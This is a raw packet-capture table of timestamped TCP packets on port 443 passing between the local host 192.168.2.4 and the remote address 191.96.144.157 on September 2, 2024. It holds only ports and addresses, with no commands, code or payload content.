Sep 2, 2024 11:42:53.602479935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602525949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602528095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602535009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602571964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602580070 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602583885 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602608919 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602622032 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602664948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602669001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602710962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602754116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602806091 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602875948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684396029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684449911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684489965 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684498072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684511900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684511900 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684540033 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684544086 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684561014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684570074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684617043 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684621096 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684628963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684659958 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684664011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684679031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684684038 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684726954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684730053 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684737921 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684775114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684786081 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684833050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684845924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684886932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684897900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684900999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684931040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684937000 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684950113 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684952974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.684984922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.684993982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685044050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685048103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685058117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685110092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685112000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685118914 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685163021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685163975 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685173035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685209036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685226917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685275078 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685287952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685308933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685342073 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685379028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685431004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685431004 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685441971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685481071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685487986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685534000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685537100 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685563087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685580969 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685584068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685610056 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685653925 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685698032 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685702085 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685750008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685750961 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685759068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685802937 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685805082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685817003 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685861111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685868025 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685882092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685914993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685921907 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.685925961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.685964108 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686090946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686578035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686642885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686702967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686748981 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686757088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686805964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686810970 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686820030 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686858892 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686918974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686959982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686964989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.686969995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.686996937 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.687022924 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.687022924 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.687443972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768477917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768537998 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768584013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768590927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768598080 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768620968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768634081 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768640041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768676043 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768683910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768687963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768722057 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768738031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768785954 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768785954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768796921 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768838882 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768891096 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768943071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768945932 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.768951893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.768992901 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769010067 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769074917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769078016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769085884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769134998 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769203901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769258022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769468069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769521952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769632101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769675970 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769687891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769691944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769725084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769728899 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769738913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769778967 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769789934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769833088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769840002 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769844055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769881010 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769943953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.769999027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.769999027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770009041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770052910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770061970 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770066023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770103931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770107031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770116091 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770153046 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770163059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770167112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770205021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770211935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770215988 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770252943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770256996 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770263910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770308018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770318985 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770353079 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770385027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770385027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770783901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770838022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770873070 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.770920992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.770962954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.771024942 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.771076918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.771136045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.771148920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.771189928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.771208048 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.771213055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.771235943 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.771253109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.771359921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.853774071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.853883982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.853979111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.853979111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.853986979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854032993 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854096889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854152918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854270935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854322910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854322910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854332924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854367018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854387045 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854428053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854435921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854439020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854485989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.854542017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.854599953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855504990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855545044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855567932 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855572939 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855586052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855618000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855640888 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855693102 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855707884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855756998 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855855942 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.855909109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.855983973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856033087 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856077909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856149912 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856245995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856293917 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856307983 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856353998 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856503963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856545925 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856551886 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856554985 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856589079 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856647015 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856698990 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856703997 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856755018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856841087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856898069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856905937 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856910944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856959105 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856966019 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.856967926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.856978893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857057095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857136011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857182026 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857183933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857192993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857224941 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857286930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857321978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857333899 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857336998 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857368946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857631922 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857670069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857677937 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857681990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857727051 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857759953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857800007 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857815981 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857820034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857866049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857898951 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.857947111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.857980967 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938617945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938705921 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938724995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938739061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938750029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938802004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938852072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938915968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938915968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938915968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938915968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938922882 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938931942 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.938978910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.938982964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939016104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939021111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939033985 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939063072 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939066887 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939084053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939090014 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939095974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939131021 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939153910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939162016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939166069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939187050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939198017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939243078 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939244986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939254999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939289093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939301968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939305067 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939332008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939347029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939347982 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939357996 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939397097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939398050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939444065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939448118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939461946 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939511061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939516068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939524889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939562082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939583063 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939587116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939608097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939707041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939747095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939750910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939759016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939802885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939807892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939817905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939873934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939929008 CEST	443	49763	191.96.144.157	192.168.2.4
